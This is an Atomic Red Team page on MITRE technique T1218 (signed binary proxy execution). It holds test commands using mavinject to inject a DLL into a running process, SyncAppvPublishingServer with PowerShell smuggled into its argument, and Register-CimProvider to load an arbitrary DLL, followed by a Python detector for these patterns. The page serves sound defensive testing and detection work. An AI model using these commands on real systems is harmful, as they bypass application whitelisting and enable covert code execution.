# T1218 - Signed Binary Proxy Execution

Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.

### Mavinject.exe

Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)

```cmd
"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" /INJECTRUNNING
C:\Windows\system32\mavinject.exe /INJECTRUNNING
```

### SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)

Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)

## Atomic Tests


## Atomic Test #1 - mavinject - Inject DLL into running process

Injects an arbitrary DLL into a running process specified by process ID. Requires Windows 10.

**Supported Platforms:** Windows

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to inject | Path | C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll |
| process_id | PID of process receiving injection | string | 1000 |

#### Run it with `command_prompt`!

```cmd
mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
```


## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

**Supported Platforms:** Windows

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe |

#### Run it with `command_prompt`!

```cmd
SyncAppvPublishingServer.exe "n; #{powershell_code}"
```


## Atomic Test #3 - Register-CimProvider - Execute evil dll

Executes an arbitrary DLL. Requires at least Windows 8/2012. Also note that this DLL can be served up via SMB.

**Supported Platforms:** Windows

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll |

#### Run it with `command_prompt`!

```cmd
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
```
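As an added detection example (not part of the Atomic Red Team page or its test definitions), the following Python scans process-creation records for the three invocation patterns documented above: mavinject.exe with `/INJECTRUNNING`, SyncAppvPublishingServer.exe with an argument containing `;`, and Register-CimProvider.exe with `-Path`, flagging a UNC DLL path separately because Test #3 notes the DLL can be served over SMB. The event records, field names (borrowed from Sysmon Event ID 1) and rule names are assumptions constructed here, not real telemetry; the command lines reuse the defaults from the tests so the rules can be validated against a lab run.

```python
"""Added example: detect the T1218 proxy-execution patterns on this page in
process-creation events. Records are constructed; field names mirror Sysmon
Event ID 1 (Image, CommandLine, ParentImage) but nothing here is real telemetry."""
import ntpath
import re

TECHNIQUE = "T1218"

# Constructed sample events (assumption: Sysmon-style field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mavinject.exe",
     "CommandLine": r"mavinject.exe 1000 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe",
     "CommandLine": r'"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" 4120 /INJECTRUNNING C:\Users\Public\T1218.dll',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\SyncAppvPublishingServer.exe",
     "CommandLine": r'SyncAppvPublishingServer.exe "n; Start-Process calc.exe"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\SyncAppvPublishingServer.exe",   # constructed benign launch, no arguments
     "CommandLine": r"C:\Windows\System32\SyncAppvPublishingServer.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\SysWOW64\Register-CimProvider.exe",
     "CommandLine": r"C:\Windows\SysWow64\Register-CimProvider.exe -Path C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\SysWOW64\Register-CimProvider.exe",       # constructed: DLL served from an SMB share
     "CommandLine": r"Register-CimProvider.exe -Path \\fileserver\share\T1218-2.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# mavinject.exe <pid> /INJECTRUNNING <dll>; the PID is optional so the form quoted
# in the technique description (no PID shown) still matches.
MAVINJECT_RE = re.compile(r'(?:(?P<pid>\d+)\s+)?/INJECTRUNNING\s+(?P<dll>"[^"]+"|\S+)', re.IGNORECASE)
# Everything after the executable name; Test #2 passes "n; <powershell>".
SYNCAPPV_RE = re.compile(r'SyncAppvPublishingServer\.exe"?\s+(?P<args>.+)$', re.IGNORECASE)
# Register-CimProvider.exe -Path <dll>
CIMPROVIDER_RE = re.compile(r'-Path\s+(?P<dll>"[^"]+"|\S+)', re.IGNORECASE)


def _finding(rule, event, detail, target_pid=None, remote_dll=False):
    return {"technique": TECHNIQUE, "rule": rule,
            "image": ntpath.basename(event["Image"]),
            "parent": ntpath.basename(event.get("ParentImage", "")),
            "detail": detail, "target_pid": target_pid, "remote_dll": remote_dll}


def check_event(event):
    """Return a finding dict for one process-creation event, or None if it matches no rule."""
    image = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    if image in ("mavinject.exe", "mavinject32.exe"):
        m = MAVINJECT_RE.search(cmd)
        if m:
            dll = m.group("dll").strip('"')
            return _finding("mavinject_injectrunning", event, dll,
                            target_pid=m.group("pid"), remote_dll=dll.startswith("\\\\"))
    elif image == "syncappvpublishingserver.exe":
        m = SYNCAPPV_RE.search(cmd)
        # Test #2 smuggles PowerShell after a ';' in the single argument, so any
        # ';' in the arguments is surfaced; a launch with no arguments is not.
        if m and ";" in m.group("args"):
            return _finding("syncappv_inline_script", event, m.group("args").strip('"'))
    elif image == "register-cimprovider.exe":
        m = CIMPROVIDER_RE.search(cmd)
        if m:
            dll = m.group("dll").strip('"')
            # A UNC path means the DLL was loaded from a share (the SMB case in Test #3).
            return _finding("register_cimprovider_dll", event, dll, remote_dll=dll.startswith("\\\\"))
    return None


def scan(events):
    """Run check_event over a sequence of events and collect the findings in order."""
    return [f for f in (check_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['technique']}] {f['rule']:<26} {f['image']} <- {f['parent']}: {f['detail']}"
              + (" (UNC path)" if f["remote_dll"] else ""))
```

The rules key on command-line content rather than on the parent process, so a legitimate App-V publishing sync with no trailing arguments produces nothing while the `"n; ..."` form from Test #2 does; in a real deployment the parent image and the DLL path (user-writable directory or UNC share) are the fields to use for prioritisation, and the test defaults above give exact strings to confirm the rules fire after a lab execution.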